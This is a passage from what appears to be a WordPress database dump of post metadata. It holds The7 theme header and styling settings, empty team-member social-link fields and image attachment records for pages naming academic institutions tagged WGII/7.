(21227,3341,'_dt_teammate_options_stumbleupon',''),
(21228,3341,'_dt_teammate_options_behance',''),
(21229,3341,'_dt_teammate_options_px-500',''),
(21230,3341,'_dt_teammate_options_tripedvisor',''),
(21231,3341,'_dt_teammate_options_vk',''),
(21232,3341,'_dt_teammate_options_foursquare',''),
(21233,3341,'_dt_teammate_options_xing',''),
(21234,3341,'_dt_teammate_options_weibo',''),
(21235,3341,'_dt_teammate_options_odnoklassniki',''),
(21236,3341,'_dt_teammate_options_research-gate',''),
(21237,3341,'_dt_teammate_options_yelp',''),
(21238,3341,'_dt_teammate_options_blogger',''),
(21239,3341,'_dt_teammate_options_soundcloud',''),
(21240,3341,'_dt_teammate_options_viber',''),
(21241,3341,'_dt_teammate_options_whatsapp',''),
(21242,3341,'_dt_teammate_options_reddit',''),
(21243,3341,'_dt_teammate_options_snapchat',''),
(21244,3341,'_dt_teammate_options_telegram',''),
(21245,3341,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21246,3343,'_edit_lock','1669183839:1'),
(21247,3344,'_wp_attached_file','2022/11/w224.jpg'),
(21248,3344,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:78;s:6:\"height\";i:104;s:4:\"file\";s:16:\"2022/11/w224.jpg\";s:8:\"filesize\";i:23550;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21249,3343,'_thumbnail_id','3344'),
(21250,3343,'_edit_last','1'),
(21251,3343,'_dt_sidebar_position','disabled'),
(21252,3343,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21253,3343,'_dt_sidebar_hide_on_mobile','0'),
(21254,3343,'_dt_footer_show','1'),
(21255,3343,'_dt_footer_widgetarea_id','sidebar_2'),
(21256,3343,'_dt_footer_hide_on_mobile','0'),
(21257,3343,'_dt_header_title','fancy'),
(21258,3343,'_dt_header_background','normal'),
(21259,3343,'_dt_header_background_below_slideshow','disabled'),
(21260,3343,'_dt_header_transparent_bg_color_scheme','light'),
(21261,3343,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21262,3343,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21263,3343,'_dt_header_transparent_bg_color','#000000'),
(21264,3343,'_dt_header_transparent_bg_opacity','50'),
(21265,3343,'_dt_header_disabled_background','normal'),
(21266,3343,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21267,3343,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21268,3343,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21269,3343,'_dt_header_disabled_transparent_bg_color','#000000'),
(21270,3343,'_dt_header_disabled_transparent_bg_opacity','50'),
(21271,3343,'_dt_page_overrides_top_margin',''),
(21272,3343,'_dt_page_overrides_right_margin',''),
(21273,3343,'_dt_page_overrides_bottom_margin',''),
(21274,3343,'_dt_page_overrides_left_margin',''),
(21275,3343,'_dt_mobile_page_padding_top',''),
(21276,3343,'_dt_mobile_page_padding_right',''),
(21277,3343,'_dt_mobile_page_padding_bottom',''),
(21278,3343,'_dt_mobile_page_padding_left',''),
(21279,3343,'_dt_fancy_header_layout_heading',''),
(21280,3343,'_dt_fancy_header_title_aligment','center'),
(21281,3343,'_dt_fancy_header_height','300'),
(21282,3343,'_dt_fancy_header_padding-top','0px'),
(21283,3343,'_dt_fancy_header_padding-bottom','0px'),
(21284,3343,'_dt_fancy_header_breadcrumbs_heading',''),
(21285,3343,'_dt_fancy_header_breadcrumbs','enabled'),
(21286,3343,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21287,3343,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21288,3343,'_dt_fancy_header_title_heading',''),
(21289,3343,'_dt_fancy_header_title_mode','custom'),
(21290,3343,'_dt_fancy_header_title','Caterina Balletti University Iuav of Venice (WGII/7)'),
(21291,3343,'_dt_fancy_header_title_font_size','30'),
(21292,3343,'_dt_fancy_header_title_line_height','36'),
(21293,3343,'_dt_fancy_header_text_transform','none'),
(21294,3343,'_dt_fancy_header_title_color_mode','color'),
(21295,3343,'_dt_fancy_header_title_color','#ffffff'),
(21296,3343,'_dt_fancy_header_subtitle_heading',''),
(21297,3343,'_dt_fancy_header_subtitle',''),
(21298,3343,'_dt_fancy_header_subtitle_font_size','18'),
(21299,3343,'_dt_fancy_header_subtitle_line_height','26'),
(21300,3343,'_dt_fancy_header_subtitle_text_transform','none'),
(21301,3343,'_dt_fancy_header_subtitle_color_mode','color'),
(21302,3343,'_dt_fancy_header_subtitle_color','#ffffff'),
(21303,3343,'_dt_fancy_header_bg_heading',''),
(21304,3343,'_dt_fancy_header_bg_color','#222222'),
(21305,3343,'_dt_fancy_header_bg_image_origin','custom'),
(21306,3343,'_dt_fancy_header_bg_image','a:0:{}'),
(21307,3343,'_dt_fancy_header_bg_repeat','no-repeat'),
(21308,3343,'_dt_fancy_header_bg_position_x','center'),
(21309,3343,'_dt_fancy_header_bg_position_y','center'),
(21310,3343,'_dt_fancy_header_bg_fullscreen','1'),
(21311,3343,'_dt_fancy_header_bg_overlay','0'),
(21312,3343,'_dt_fancy_header_overlay_color','#000'),
(21313,3343,'_dt_fancy_header_bg_overlay_opacity','50'),
(21314,3343,'_dt_fancy_header_scroll_effect','default'),
(21315,3343,'_dt_fancy_header_bg_parallax','0.5'),
(21316,3343,'_dt_fancy_header_responsiveness_heading',''),
(21317,3343,'_dt_fancy_header_responsiveness','disabled'),
(21318,3343,'_dt_fancy_header_responsiveness_switch','778px'),
(21319,3343,'_dt_fancy_header_responsive_height','70'),
(21320,3343,'_dt_fancy_header_responsive_font_size','30'),
(21321,3343,'_dt_fancy_header_responsive_title_line_height','38'),
(21322,3343,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21323,3343,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21324,3343,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21325,3343,'_dt_teammate_options_go_to_single','1'),
(21326,3343,'_dt_teammate_options_position',''),
(21327,3343,'_dt_teammate_options_website',''),
(21328,3343,'_dt_teammate_options_mail',''),
(21329,3343,'_dt_teammate_options_facebook',''),
(21330,3343,'_dt_teammate_options_twitter',''),
(21331,3343,'_dt_teammate_options_dribbble',''),
(21332,3343,'_dt_teammate_options_you-tube',''),
(21333,3343,'_dt_teammate_options_rss',''),
(21334,3343,'_dt_teammate_options_delicious',''),
(21335,3343,'_dt_teammate_options_flickr',''),
(21336,3343,'_dt_teammate_options_lastfm',''),
(21337,3343,'_dt_teammate_options_linkedin',''),
(21338,3343,'_dt_teammate_options_vimeo',''),
(21339,3343,'_dt_teammate_options_tumbler',''),
(21340,3343,'_dt_teammate_options_pinterest',''),
(21341,3343,'_dt_teammate_options_devian',''),
(21342,3343,'_dt_teammate_options_skype',''),
(21343,3343,'_dt_teammate_options_github',''),
(21344,3343,'_dt_teammate_options_instagram',''),
(21345,3343,'_dt_teammate_options_stumbleupon',''),
(21346,3343,'_dt_teammate_options_behance',''),
(21347,3343,'_dt_teammate_options_px-500',''),
(21348,3343,'_dt_teammate_options_tripedvisor',''),
(21349,3343,'_dt_teammate_options_vk',''),
(21350,3343,'_dt_teammate_options_foursquare',''),
(21351,3343,'_dt_teammate_options_xing',''),
(21352,3343,'_dt_teammate_options_weibo',''),
(21353,3343,'_dt_teammate_options_odnoklassniki',''),
(21354,3343,'_dt_teammate_options_research-gate',''),
(21355,3343,'_dt_teammate_options_yelp',''),
(21356,3343,'_dt_teammate_options_blogger',''),
(21357,3343,'_dt_teammate_options_soundcloud',''),
(21358,3343,'_dt_teammate_options_viber',''),
(21359,3343,'_dt_teammate_options_whatsapp',''),
(21360,3343,'_dt_teammate_options_reddit',''),
(21361,3343,'_dt_teammate_options_snapchat',''),
(21362,3343,'_dt_teammate_options_telegram',''),
(21363,3343,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21364,3345,'_edit_lock','1669183918:1'),
(21365,3346,'_wp_attached_file','2022/11/w225.jpg'),
(21366,3346,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:82;s:6:\"height\";i:104;s:4:\"file\";s:16:\"2022/11/w225.jpg\";s:8:\"filesize\";i:18534;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21367,3345,'_thumbnail_id','3346'),
(21368,3345,'_edit_last','1'),
(21369,3345,'_dt_sidebar_position','disabled'),
(21370,3345,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21371,3345,'_dt_sidebar_hide_on_mobile','0'),
(21372,3345,'_dt_footer_show','1'),
(21373,3345,'_dt_footer_widgetarea_id','sidebar_2'),
(21374,3345,'_dt_footer_hide_on_mobile','0'),
(21375,3345,'_dt_header_title','fancy'),
(21376,3345,'_dt_header_background','normal'),
(21377,3345,'_dt_header_background_below_slideshow','disabled'),
(21378,3345,'_dt_header_transparent_bg_color_scheme','light'),
(21379,3345,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21380,3345,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21381,3345,'_dt_header_transparent_bg_color','#000000'),
(21382,3345,'_dt_header_transparent_bg_opacity','50'),
(21383,3345,'_dt_header_disabled_background','normal'),
(21384,3345,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21385,3345,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21386,3345,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21387,3345,'_dt_header_disabled_transparent_bg_color','#000000'),
(21388,3345,'_dt_header_disabled_transparent_bg_opacity','50'),
(21389,3345,'_dt_page_overrides_top_margin',''),
(21390,3345,'_dt_page_overrides_right_margin',''),
(21391,3345,'_dt_page_overrides_bottom_margin',''),
(21392,3345,'_dt_page_overrides_left_margin',''),
(21393,3345,'_dt_mobile_page_padding_top',''),
(21394,3345,'_dt_mobile_page_padding_right',''),
(21395,3345,'_dt_mobile_page_padding_bottom',''),
(21396,3345,'_dt_mobile_page_padding_left',''),
(21397,3345,'_dt_fancy_header_layout_heading',''),
(21398,3345,'_dt_fancy_header_title_aligment','center'),
(21399,3345,'_dt_fancy_header_height','300'),
(21400,3345,'_dt_fancy_header_padding-top','0px'),
(21401,3345,'_dt_fancy_header_padding-bottom','0px'),
(21402,3345,'_dt_fancy_header_breadcrumbs_heading',''),
(21403,3345,'_dt_fancy_header_breadcrumbs','disabled'),
(21404,3345,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21405,3345,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21406,3345,'_dt_fancy_header_title_heading',''),
(21407,3345,'_dt_fancy_header_title_mode','custom'),
(21408,3345,'_dt_fancy_header_title','TU Wien (WGII/7)'),
(21409,3345,'_dt_fancy_header_title_font_size','30'),
(21410,3345,'_dt_fancy_header_title_line_height','36'),
(21411,3345,'_dt_fancy_header_text_transform','none'),
(21412,3345,'_dt_fancy_header_title_color_mode','color'),
(21413,3345,'_dt_fancy_header_title_color','#ffffff'),
(21414,3345,'_dt_fancy_header_subtitle_heading',''),
(21415,3345,'_dt_fancy_header_subtitle',''),
(21416,3345,'_dt_fancy_header_subtitle_font_size','18'),
(21417,3345,'_dt_fancy_header_subtitle_line_height','26'),
(21418,3345,'_dt_fancy_header_subtitle_text_transform','none'),
(21419,3345,'_dt_fancy_header_subtitle_color_mode','color'),
(21420,3345,'_dt_fancy_header_subtitle_color','#ffffff'),
(21421,3345,'_dt_fancy_header_bg_heading',''),
(21422,3345,'_dt_fancy_header_bg_color','#222222'),
(21423,3345,'_dt_fancy_header_bg_image_origin','custom'),
(21424,3345,'_dt_fancy_header_bg_image','a:0:{}'),
(21425,3345,'_dt_fancy_header_bg_repeat','no-repeat'),
(21426,3345,'_dt_fancy_header_bg_position_x','center'),
(21427,3345,'_dt_fancy_header_bg_position_y','center'),
(21428,3345,'_dt_fancy_header_bg_fullscreen','1'),
(21429,3345,'_dt_fancy_header_bg_overlay','0'),
(21430,3345,'_dt_fancy_header_overlay_color','#000'),
(21431,3345,'_dt_fancy_header_bg_overlay_opacity','50'),
(21432,3345,'_dt_fancy_header_scroll_effect','default'),
(21433,3345,'_dt_fancy_header_bg_parallax','0.5'),
(21434,3345,'_dt_fancy_header_responsiveness_heading',''),
(21435,3345,'_dt_fancy_header_responsiveness','disabled'),
(21436,3345,'_dt_fancy_header_responsiveness_switch','778px'),
(21437,3345,'_dt_fancy_header_responsive_height','70'),
(21438,3345,'_dt_fancy_header_responsive_font_size','30'),
(21439,3345,'_dt_fancy_header_responsive_title_line_height','38'),
(21440,3345,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21441,3345,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21442,3345,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21443,3345,'_dt_teammate_options_go_to_single','1'),
(21444,3345,'_dt_teammate_options_position',''),
(21445,3345,'_dt_teammate_options_website',''),
(21446,3345,'_dt_teammate_options_mail',''),
(21447,3345,'_dt_teammate_options_facebook',''),
(21448,3345,'_dt_teammate_options_twitter',''),
(21449,3345,'_dt_teammate_options_dribbble',''),
(21450,3345,'_dt_teammate_options_you-tube',''),
(21451,3345,'_dt_teammate_options_rss',''),
(21452,3345,'_dt_teammate_options_delicious',''),
(21453,3345,'_dt_teammate_options_flickr',''),
(21454,3345,'_dt_teammate_options_lastfm',''),
(21455,3345,'_dt_teammate_options_linkedin',''),
(21456,3345,'_dt_teammate_options_vimeo',''),
(21457,3345,'_dt_teammate_options_tumbler',''),
(21458,3345,'_dt_teammate_options_pinterest',''),
(21459,3345,'_dt_teammate_options_devian',''),
(21460,3345,'_dt_teammate_options_skype',''),
(21461,3345,'_dt_teammate_options_github',''),
(21462,3345,'_dt_teammate_options_instagram',''),
(21463,3345,'_dt_teammate_options_stumbleupon',''),
(21464,3345,'_dt_teammate_options_behance',''),
(21465,3345,'_dt_teammate_options_px-500',''),
(21466,3345,'_dt_teammate_options_tripedvisor',''),
(21467,3345,'_dt_teammate_options_vk',''),
(21468,3345,'_dt_teammate_options_foursquare',''),
(21469,3345,'_dt_teammate_options_xing',''),
(21470,3345,'_dt_teammate_options_weibo',''),
(21471,3345,'_dt_teammate_options_odnoklassniki',''),
(21472,3345,'_dt_teammate_options_research-gate',''),
(21473,3345,'_dt_teammate_options_yelp',''),
(21474,3345,'_dt_teammate_options_blogger',''),
(21475,3345,'_dt_teammate_options_soundcloud',''),
(21476,3345,'_dt_teammate_options_viber',''),
(21477,3345,'_dt_teammate_options_whatsapp',''),
(21478,3345,'_dt_teammate_options_reddit',''),
(21479,3345,'_dt_teammate_options_snapchat',''),
(21480,3345,'_dt_teammate_options_telegram',''),
(21481,3345,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21482,3347,'_edit_lock','1669183996:1'),
(21483,3348,'_wp_attached_file','2022/11/w226.jpg'),
(21484,3348,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:83;s:6:\"height\";i:108;s:4:\"file\";s:16:\"2022/11/w226.jpg\";s:8:\"filesize\";i:20863;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21485,3347,'_thumbnail_id','3348'),
(21486,3347,'_edit_last','1'),
(21487,3347,'_dt_sidebar_position','disabled'),
(21488,3347,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21489,3347,'_dt_sidebar_hide_on_mobile','0'),
(21490,3347,'_dt_footer_show','1'),
(21491,3347,'_dt_footer_widgetarea_id','sidebar_2'),
(21492,3347,'_dt_footer_hide_on_mobile','0'),
(21493,3347,'_dt_header_title','fancy'),
(21494,3347,'_dt_header_background','normal'),
(21495,3347,'_dt_header_background_below_slideshow','disabled'),
(21496,3347,'_dt_header_transparent_bg_color_scheme','light'),
(21497,3347,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21498,3347,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21499,3347,'_dt_header_transparent_bg_color','#000000'),
(21500,3347,'_dt_header_transparent_bg_opacity','50'),
(21501,3347,'_dt_header_disabled_background','normal'),
(21502,3347,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21503,3347,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21504,3347,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21505,3347,'_dt_header_disabled_transparent_bg_color','#000000'),
(21506,3347,'_dt_header_disabled_transparent_bg_opacity','50'),
(21507,3347,'_dt_page_overrides_top_margin',''),
(21508,3347,'_dt_page_overrides_right_margin',''),
(21509,3347,'_dt_page_overrides_bottom_margin',''),
(21510,3347,'_dt_page_overrides_left_margin',''),
(21511,3347,'_dt_mobile_page_padding_top',''),
(21512,3347,'_dt_mobile_page_padding_right',''),
(21513,3347,'_dt_mobile_page_padding_bottom',''),
(21514,3347,'_dt_mobile_page_padding_left',''),
(21515,3347,'_dt_fancy_header_layout_heading',''),
(21516,3347,'_dt_fancy_header_title_aligment','center'),
(21517,3347,'_dt_fancy_header_height','300'),
(21518,3347,'_dt_fancy_header_padding-top','0px'),
(21519,3347,'_dt_fancy_header_padding-bottom','0px'),
(21520,3347,'_dt_fancy_header_breadcrumbs_heading',''),
(21521,3347,'_dt_fancy_header_breadcrumbs','disabled'),
(21522,3347,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21523,3347,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21524,3347,'_dt_fancy_header_title_heading',''),
(21525,3347,'_dt_fancy_header_title_mode','custom'),
(21526,3347,'_dt_fancy_header_title','National Technical University of Athens (WGII/7)'),
(21527,3347,'_dt_fancy_header_title_font_size','30'),
(21528,3347,'_dt_fancy_header_title_line_height','36'),
(21529,3347,'_dt_fancy_header_text_transform','none'),
(21530,3347,'_dt_fancy_header_title_color_mode','color'),
(21531,3347,'_dt_fancy_header_title_color','#ffffff'),
(21532,3347,'_dt_fancy_header_subtitle_heading',''),
(21533,3347,'_dt_fancy_header_subtitle',''),
(21534,3347,'_dt_fancy_header_subtitle_font_size','18'),
(21535,3347,'_dt_fancy_header_subtitle_line_height','26'),
(21536,3347,'_dt_fancy_header_subtitle_text_transform','none'),
(21537,3347,'_dt_fancy_header_subtitle_color_mode','color'),
(21538,3347,'_dt_fancy_header_subtitle_color','#ffffff'),
(21539,3347,'_dt_fancy_header_bg_heading',''),
(21540,3347,'_dt_fancy_header_bg_color','#222222'),
(21541,3347,'_dt_fancy_header_bg_image_origin','custom'),
(21542,3347,'_dt_fancy_header_bg_image','a:0:{}'),
(21543,3347,'_dt_fancy_header_bg_repeat','no-repeat'),
(21544,3347,'_dt_fancy_header_bg_position_x','center'),
(21545,3347,'_dt_fancy_header_bg_position_y','center'),
(21546,3347,'_dt_fancy_header_bg_fullscreen','1'),
(21547,3347,'_dt_fancy_header_bg_overlay','0'),
(21548,3347,'_dt_fancy_header_overlay_color','#000'),
(21549,3347,'_dt_fancy_header_bg_overlay_opacity','50'),
(21550,3347,'_dt_fancy_header_scroll_effect','default'),
(21551,3347,'_dt_fancy_header_bg_parallax','0.5'),
(21552,3347,'_dt_fancy_header_responsiveness_heading',''),
(21553,3347,'_dt_fancy_header_responsiveness','disabled'),
(21554,3347,'_dt_fancy_header_responsiveness_switch','778px'),
(21555,3347,'_dt_fancy_header_responsive_height','70'),
(21556,3347,'_dt_fancy_header_responsive_font_size','30'),
(21557,3347,'_dt_fancy_header_responsive_title_line_height','38'),
(21558,3347,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21559,3347,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21560,3347,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21561,3347,'_dt_teammate_options_go_to_single','1'),
(21562,3347,'_dt_teammate_options_position',''),
(21563,3347,'_dt_teammate_options_website',''),
(21564,3347,'_dt_teammate_options_mail',''),
(21565,3347,'_dt_teammate_options_facebook',''),
(21566,3347,'_dt_teammate_options_twitter',''),
(21567,3347,'_dt_teammate_options_dribbble',''),
(21568,3347,'_dt_teammate_options_you-tube',''),
(21569,3347,'_dt_teammate_options_rss',''),
(21570,3347,'_dt_teammate_options_delicious',''),
(21571,3347,'_dt_teammate_options_flickr',''),
(21572,3347,'_dt_teammate_options_lastfm',''),
(21573,3347,'_dt_teammate_options_linkedin',''),
(21574,3347,'_dt_teammate_options_vimeo',''),
(21575,3347,'_dt_teammate_options_tumbler',''),
(21576,3347,'_dt_teammate_options_pinterest',''),
(21577,3347,'_dt_teammate_options_devian',''),
(21578,3347,'_dt_teammate_options_skype',''),
(21579,3347,'_dt_teammate_options_github',''),
(21580,3347,'_dt_teammate_options_instagram',''),
(21581,3347,'_dt_teammate_options_stumbleupon',''),
(21582,3347,'_dt_teammate_options_behance',''),
(21583,3347,'_dt_teammate_options_px-500',''),
(21584,3347,'_dt_teammate_options_tripedvisor',''),
(21585,3347,'_dt_teammate_options_vk',''),
(21586,3347,'_dt_teammate_options_foursquare',''),
(21587,3347,'_dt_teammate_options_xing',''),
(21588,3347,'_dt_teammate_options_weibo',''),
(21589,3347,'_dt_teammate_options_odnoklassniki',''),
(21590,3347,'_dt_teammate_options_research-gate',''),
(21591,3347,'_dt_teammate_options_yelp',''),
(21592,3347,'_dt_teammate_options_blogger',''),
(21593,3347,'_dt_teammate_options_soundcloud',''),
(21594,3347,'_dt_teammate_options_viber',''),
(21595,3347,'_dt_teammate_options_whatsapp',''),
(21596,3347,'_dt_teammate_options_reddit',''),
(21597,3347,'_dt_teammate_options_snapchat',''),
(21598,3347,'_dt_teammate_options_telegram',''),
(21599,3347,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    